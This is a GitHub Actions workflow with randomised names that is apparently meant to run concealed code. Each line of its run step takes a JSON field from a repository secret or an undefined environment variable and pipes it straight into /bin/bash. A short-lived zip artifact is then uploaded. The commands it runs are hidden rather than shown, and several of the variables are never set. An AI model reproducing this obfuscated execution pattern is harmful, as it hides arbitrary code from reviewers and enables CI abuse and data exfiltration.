name: controllerkarenrs
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: controllerkarenrs
        env:
          ehqy09: ${{ secrets.ehqy09 }}
        run: |
          printf '%s' "$ehqy09" | jq -r .qmt2 | /bin/bash
          echo $vcn646 | jq -r .vd936 | /bin/bash
          echo $g111 | jq -r .shxng24 | /bin/bash
          printf '%s' "$vbucf913" | jq -r .qio3714 | /bin/bash
          echo $m6 | jq -r .fqze1616 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: SmNZYVUb
          path: "*.zip"
          retention-days: 1
